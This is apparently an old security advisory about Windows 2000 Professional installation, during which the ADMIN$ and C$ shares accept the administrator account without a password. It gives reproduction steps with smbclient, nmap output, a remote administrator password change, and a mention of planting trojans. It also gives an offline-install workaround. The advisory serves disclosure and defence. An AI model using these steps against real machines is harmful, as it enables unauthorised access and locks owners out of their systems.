install procedure




    Stephane Aubert found following.  During the installation  process
    of Windows  2000 professionnal  anyone can  connect to  the ADMIN$
    share as ADMINISTRATOR whithout any password.  Verification:

        % ./smbclient \\\\WINDOZE\\ADMIN$ -I xxx.yyy.zzz.ttt -U 'administrator' -d 0 -N
        Unable to open configuration file "/usr/local/samba/lib/smb.conf"!
        pm_process retuned false
        Can't load /usr/local/samba/lib/smb.conf - run testparm to debug it
        Domain=[GROAR] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
        smb: \>

    As a lot of people asked for information on the unsecure win2k pro
    installation  process,  here  are  further  information  on   this
    vulnerability.  All  these tests have  been made and  checked with
    Denis  Ducamp  and  Alain  Thivillon,  2 serious security experts.
    What the have done:

    1. Install the final release of win2k pro (build 2195)
    2. Do  not give  any IP  address during  the install.   If no DHCP
       server is responding the  win2k pro box take as
       IP address.  (The  address range used is, which
       is  registered   with  the   IANA  as   the  LINKLOCAL    net.)
       Notice: if a real  IP address is given  by the admin or  a DCHP
       server you can connect directely, and jump to step 4 right now.
    3. On  your  favorit  Linux  (or  *BSD)  box  add an alias to  the
       interface:  # ifconfig eth0:0
    4. Just after the configuration of  COM+ by win2k you can ping  or
       scan it:

        % nmap
        Starting nmap V. 2.3BETA10 by Fyodor (,
        Interesting ports on  (
        Port    State       Protocol  Service
        139     open        tcp       netbios-ssn
        # nmap  -sU -p 1-200
        Starting nmap V. 2.3BETA10 by Fyodor (,
        Interesting ports on  (
        Port    State       Protocol  Service
        137     open        udp       netbios-ns
        138     open        udp       netbios-dgm

       Notice: the administrtor have already entered a password !!!

    5. By now, you can connect via SMB (smbclient for example) to  the
       C$ or ADMIN$ share WITHOUT  ANY PASSWORD !!!  This  until win2k
       asked the admin to reboot the computer.  Notice: it's  possible
       to use NAT (netbios auditing  tool) to obtain the netbios  name
       of the windows box and the shares.

        % ./smbclient //groar/c$ -I -U administrator
        added interface ip= bcast= nmask=
        Password: <EMPTY>
        Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
        smb: \> ls
         IO.SYS                            HSR    40992  Tue May 31 06:22:00 1994
         MSDOS.SYS                         HSR    38166  Tue May 31 06:22:00 1994
         COMMAND.COM                         R    56286  Tue May 31 06:22:00 1994
         WINA20.386                          A     9349  Tue May 31 06:22:00 1994
         CONFIG.SYS                          A      638  Fri Feb 18 15:34:00 2000
         AUTOEXEC.BAT                        A      690  Fri Feb 18 15:33:10 2000

    6. Worse !
       You can SET (remotly) a new administrator password:

        % ./smbpasswd -U administrator -r groar
        Old SMB password: <EMPTY>
        New SMB password: <NEWPASS>
        Retype new SMB password: <NEWPASS>
        startsmbfilepwent: unable to open file /usr/local/samba/private/smbpasswd
        unable to open smb password database.
        Password changed for user administrator.

       By now, nobody - even the administrator - even after the reboot
       - can connect (remote nor local) without the NEW password.  The
       administrator have to crack his own computer.

    7. Worse
       It is also (evidence) possible to transfert a trojan on the new
       computer or just a  rootkit ( in order  to keep
       administrator privileges for a long time.


    Nothing yet.  Do install without network connection.